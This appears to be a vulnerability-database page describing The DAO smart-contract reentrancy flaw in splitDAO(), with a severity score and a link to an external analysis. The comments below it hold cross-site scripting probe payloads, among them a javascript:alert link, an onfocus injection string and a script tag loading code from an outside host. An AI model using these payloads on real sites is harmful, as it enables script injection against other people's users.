Back to Vulnerability database

The DAO Reentrancy

ID Submit date Publish date Author Score
1 10.25.2018 10.25.2018 10.0

Description

The bug is that when splitDAO() is called, it will then call the recipients code to transfer Ethereum coin, after which the recipients code will call splitDAO() again before finishing. This causes the process to repeat itself, transferring more Ethereum coin, then calling splitDAO() again, which calls the hacker's code, which calls splitDAO(), which calls the hacker's code, and so on. The process will continue endlessly, until it drains all of TheDAO's coin.
BVSS:1.1/B:S/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H/CI:N/II:H/AI:N

Proof of concept

http://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/

Attachments

Comments


November 2, 2018 01:34pm

nice

jd
@fixit November 18, 2018 10:26am

S

December 23, 2018 03:12am

nic

zs
@zseano January 10, 2019 11:25pm
@Arbin January 15, 2019 01:04pm

<a href=javascript:alert(1);//>nice 2</a>

@Arbin January 15, 2019 01:06pm

<a>x</a>

@Abzi February 26, 2019 03:58pm

cool

@Tink2hack April 1, 2019 08:22am

14.rs

@Tink2hack April 1, 2019 08:23am

<script src=//14.rs></script>

@Tink2hack April 1, 2019 08:23am

"'--!><Input Type=Text AutoFocus Onfocus=confirm13 <!--//#

@Jerry November 27, 2019 07:09pm

yes

@Jerry November 27, 2019 07:10pm
@Jerry November 27, 2019 07:12pm

Testing

@sivanesh March 20, 2020 08:18am

@Thisisghannu August 29, 2020 07:28am

This is awesome. Thank you!

@sivanesh October 1, 2020 05:45pm
RA
@Ramonico13 March 4, 2021 10:30am

nice!

@OmeMishra April 7, 2021 04:42pm

Th
@TheBugHunter June 26, 2021 06:45am

<h1><h1>hello</h1>

cd
@cdn-cgi May 4, 2022 09:29pm

TEst

@w00t1 May 11, 2022 02:35pm

=)